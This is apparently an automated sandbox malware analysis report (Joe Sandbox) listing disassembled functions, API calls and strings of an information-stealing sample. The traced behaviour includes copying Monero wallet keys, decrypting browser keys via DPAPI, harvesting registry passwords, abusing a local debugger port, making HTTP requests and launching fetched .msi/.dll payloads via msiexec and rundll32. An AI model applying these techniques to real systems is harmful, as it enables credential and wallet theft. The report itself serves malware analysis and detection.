Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

ShellExecuteEx.SHELL32(0000003C), ref: 00413415
ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
ShellExecuteEx.SHELL32(0000003C), ref: 0041373A

Strings

.msi, xrefs: 004135E8
<, xrefs: 004136E0
/i ", xrefs: 00413634
.dll, xrefs: 00413435
C:\Windows\system32\rundll32.exe, xrefs: 00413582
"" , xrefs: 004132EA
/passive, xrefs: 004136AB
C:\Windows\system32\msiexec.exe, xrefs: 0041370F

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
Opcode Fuzzy Hash: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9

Function 004144D0 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004144EE
memset.MSVCRT ref: 00414505

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 0041453C
lstrcatA.KERNEL32(?,02EB5978), ref: 0041455B
lstrcatA.KERNEL32(?,?), ref: 0041456F
lstrcatA.KERNEL32(?,02EB5360), ref: 00414583

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F

Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563

StrStrA.SHLWAPI(?,02EB5888), ref: 00414643
GlobalFree.KERNEL32(?), ref: 00414762

Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D

lstrcatA.KERNEL32(?,00000000), ref: 004146F3
StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
lstrcatA.KERNEL32(00000000,?), ref: 00414735
lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
Opcode Fuzzy Hash: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55

Function 048D4737 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 048D4755
memset.MSVCRT ref: 048D476C

Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202

lstrcat.KERNEL32(?,00000000), ref: 048D47A3
lstrcat.KERNEL32(?,006D6D0C), ref: 048D47C2
lstrcat.KERNEL32(?,?), ref: 048D47D6
lstrcat.KERNEL32(?,006D6FD8), ref: 048D47EA

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048D9187: GetFileAttributesA.KERNEL32(00000000,?,048C1DFB,?,?,0042577C,?,?,00420E22), ref: 048D9196

Part of subcall function 048CA697: StrStrA.SHLWAPI(00000000,00421360), ref: 048CA6F0
Part of subcall function 048CA697: memcmp.MSVCRT(?,00421244,00000005), ref: 048CA749

Part of subcall function 048CA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 048CA3A3
Part of subcall function 048CA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 048CA3C8
Part of subcall function 048CA377: LocalAlloc.KERNEL32(00000040,?), ref: 048CA3E8
Part of subcall function 048CA377: ReadFile.KERNEL32(000000FF,?,00000000,048C16F6,00000000), ref: 048CA411
Part of subcall function 048CA377: LocalFree.KERNEL32(048C16F6), ref: 048CA447
Part of subcall function 048CA377: CloseHandle.KERNEL32(000000FF), ref: 048CA451

Part of subcall function 048D97B7: GlobalAlloc.KERNEL32(00000000,048D4894,048D4894), ref: 048D97CA

StrStrA.SHLWAPI(?,006D6AD8), ref: 048D48AA
GlobalFree.KERNEL32(?), ref: 048D49C9

Part of subcall function 048CA477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048C51A5,00000000,00000000), ref: 048CA4A6
Part of subcall function 048CA477: LocalAlloc.KERNEL32(00000040,?,?,?,048C51A5,00000000,?), ref: 048CA4B8
Part of subcall function 048CA477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048C51A5,00000000,00000000), ref: 048CA4E1
Part of subcall function 048CA477: LocalFree.KERNEL32(?,?,?,?,048C51A5,00000000,?), ref: 048CA4F6

Part of subcall function 048CA7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 048CA7E4

lstrcat.KERNEL32(?,00000000), ref: 048D495A
StrCmpCA.SHLWAPI(?,004208D2), ref: 048D4977
lstrcat.KERNEL32(00000000,00000000), ref: 048D4989
lstrcat.KERNEL32(00000000,?), ref: 048D499C
lstrcat.KERNEL32(00000000,00420FA0), ref: 048D49AB

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
Instruction ID: b1a7ebd6e665b9fb27d68df334cb1da82a2f83346d8d9fe02847b24d4bff3d2b
Opcode Fuzzy Hash: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
Instruction Fuzzy Hash: E27174B1D01218ABDB14EBA4DC89FEE7379AF88304F044A99E605D7190EB75EB44CF51

Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF

lstrcatA.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcatA.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

DeleteFileA.KERNEL32(00000000), ref: 004014EF
memset.MSVCRT ref: 00401516

Strings

\Monero\wallet.keys, xrefs: 0040138D
SOFTWARE\monero-project\monero-core, xrefs: 00401335
wallet_path, xrefs: 00401330
.keys, xrefs: 0040136B

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: 406416fd0cef8770c5c9c7173cbd786a4a6ea1c8551d2acd55ade52b06d068c6
Instruction ID: 8a875ffafc7cdb1f6750a56d7bf9635fee6f51bf8c43acc15b4905507f63a119
Opcode Fuzzy Hash: 406416fd0cef8770c5c9c7173cbd786a4a6ea1c8551d2acd55ade52b06d068c6
Instruction Fuzzy Hash: 915153B1E5011857CB14EB60DD96BED733D9F54304F4045EEB60A62092EE346BD8CAAE

Function 048C4B37 Relevance: 17.0, APIs: 11, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D

Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AA1
Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AB8
Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4ACF
Part of subcall function 048C4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 048C4AF0
Part of subcall function 048C4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 048C4B00

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 048C4BCC
StrCmpCA.SHLWAPI(?,006D6E80), ref: 048C4BF1
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048C4D71
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDE,00000000,?,?,00000000,?,00421AB8,00000000,?,006D6F14), ref: 048C509F
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 048C50BB
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 048C50CF
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 048C5100
InternetCloseHandle.WININET(00000000), ref: 048C5164
InternetCloseHandle.WININET(00000000), ref: 048C517C
HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 048C4DCC

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

InternetCloseHandle.WININET(00000000), ref: 048C5186

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID:
API String ID: 2402878923-0
Opcode ID: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
Instruction ID: 406b14f09fda4b3001181d540e7d59b3b9a2031151eb4731a8ba2601f801cf44
Opcode Fuzzy Hash: 4915cdb8ce48543cbc412707aa7bde3cd0b43d09323a8e95c40c05a4a77eff2b
Instruction Fuzzy Hash: 9712E271902228AADB1DEB94DC51FEEB375AF14705F604A99A147E2090EFB07F48CF52

Function 048C6537 Relevance: 16.7, APIs: 11, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D

Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AA1
Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4AB8
Part of subcall function 048C4A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 048C4ACF
Part of subcall function 048C4A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 048C4AF0
Part of subcall function 048C4A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 048C4B00

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 048C6598
StrCmpCA.SHLWAPI(?,006D6E80), ref: 048C65BA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 048C65EC
HttpOpenRequestA.WININET(00000000,00421B58,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 048C663C
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 048C6676
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 048C6688
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 048C66B4
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 048C6724
InternetCloseHandle.WININET(00000000), ref: 048C67A6
InternetCloseHandle.WININET(00000000), ref: 048C67B0
InternetCloseHandle.WININET(00000000), ref: 048C67BA

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID:
API String ID: 3074848878-0
Opcode ID: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
Instruction ID: fd940fb1dcf69ce415187eade6944be35e134daf253dccf77396911e0cb661e6
Opcode Fuzzy Hash: ac41d8ecf663f4ee37a4d0cdec011a5d743951c9ad13516bf48e5d7933a9a4d1
Instruction Fuzzy Hash: BB717271A41218EBEB14DF94CC48FEDB775AF44704F104AA9E50ABB190EBB5BA84CF41

Function 048D9407 Relevance: 16.7, APIs: 11, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 048D9463

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
Instruction ID: abdac7a0dd372cb44f53839c258eb2fc89945714d66583e168420ed343cf34a0
Opcode Fuzzy Hash: 68c812a46f952ba48fa7337b2ce4f4d30c6e31e532046c2242e001230db6a87b
Instruction Fuzzy Hash: EF71EAB5E15208ABDB04EFE4DC88FEDB779AF48304F108649F515E7294EB74AA04CB61

Function 048C9E47 Relevance: 16.4, APIs: 13, Instructions: 141stringCOMMON

Download Yara Rule

APIs

Part of subcall function 048C9CB7: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 048C9CD1

memset.MSVCRT ref: 048C9E9A
lstrcat.KERNEL32(?,004212A8), ref: 048C9EAF
lstrcat.KERNEL32(?,00000000), ref: 048C9EC5
memset.MSVCRT ref: 048C9F01
lstrcat.KERNEL32(?,004212BC), ref: 048C9F16
lstrcat.KERNEL32(?,004212C4), ref: 048C9F28
lstrcat.KERNEL32(?,?), ref: 048C9F3C
lstrcat.KERNEL32(?,004212C8), ref: 048C9F4E
lstrcat.KERNEL32(?,?), ref: 048C9F62
lstrcat.KERNEL32(?,004212CC), ref: 048C9F74
lstrlen.KERNEL32(00000000), ref: 048C9F7E
lstrlen.KERNEL32(00000000), ref: 048C9F8D

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

memset.MSVCRT ref: 048C9FE5

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
String ID:
API String ID: 689835475-0
Opcode ID: dfb927d2f1fb8a0db0fdcd0bcab99d2dca3d169bc9a1ca59a3c17c24f69ee733
Instruction ID: 1d6214e4c6929c8b9bb3ee1c8b8559eb21614ed3389c7d4ed2adbaea2889585a
Opcode Fuzzy Hash: dfb927d2f1fb8a0db0fdcd0bcab99d2dca3d169bc9a1ca59a3c17c24f69ee733
Instruction Fuzzy Hash: F95160B1D00218ABDB14EBE4DC99FEE7738BF14306F405A99E505E6090EB75A644CF62

Function 00409A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
InternetCloseHandle.WININET(00000000), ref: 00409AC7

Strings

"webSocketDebuggerUrl":, xrefs: 00409B4B
http://localhost:9229/json, xrefs: 00409A9F
"ws://, xrefs: 00409B84

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 3289985339-2144369209
Opcode ID: f6ea82a8e87bece4c9da886c2de84f051623a7f4925580be6bfbf86350bd66ae
Instruction ID: 62dbe43bf40bcea2ec6919899f10ce169cdfcd29f6908f6eb26e58a13f6c9638
Opcode Fuzzy Hash: f6ea82a8e87bece4c9da886c2de84f051623a7f4925580be6bfbf86350bd66ae
Instruction Fuzzy Hash: 27414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505B6191DBB8AEC0CF68

Function 00407630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407330: memset.MSVCRT ref: 00407374
Part of subcall function 00407330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9

lstrcatA.KERNEL32(00000000,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 004076A8
lstrcatA.KERNEL32(00000000, : ), ref: 004076BA
lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076EF
lstrcatA.KERNEL32(00000000,00421934), ref: 00407700
lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00407733
lstrcatA.KERNEL32(00000000,00421938), ref: 0040774D
task.LIBCPMTD ref: 0040775B

Strings

: , xrefs: 004076AE

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
Opcode Fuzzy Hash: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96

Function 048D1862 Relevance: 15.2, APIs: 10, Instructions: 205stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(?,?), ref: 048D1892

Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202

Part of subcall function 048D9657: StrStrA.SHLWAPI(\nm,00000000,00000000,?,048CA1D8,00000000,006D6E5C,00000000), ref: 048D9663

lstrcpy.KERNEL32(?,00000000), ref: 048D18CE

Part of subcall function 048D9657: lstrcpyn.KERNEL32(006D7580,\nm,\nm,?,048CA1D8,00000000,006D6E5C), ref: 048D9687
Part of subcall function 048D9657: lstrlen.KERNEL32(00000000,?,048CA1D8,00000000,006D6E5C), ref: 048D969E
Part of subcall function 048D9657: wsprintfA.USER32 ref: 048D96BE

lstrcpy.KERNEL32(?,00000000), ref: 048D1916
lstrcpy.KERNEL32(?,00000000), ref: 048D195E
lstrcpy.KERNEL32(?,00000000), ref: 048D19A5
lstrcpy.KERNEL32(?,00000000), ref: 048D19ED
lstrcpy.KERNEL32(?,00000000), ref: 048D1A35
lstrcpy.KERNEL32(?,00000000), ref: 048D1A7C
lstrcpy.KERNEL32(?,00000000), ref: 048D1AC4

Part of subcall function 048DAD97: lstrlen.KERNEL32(048C51BC,?,?,048C51BC,00420DDF), ref: 048DADA2
Part of subcall function 048DAD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 048DADFC

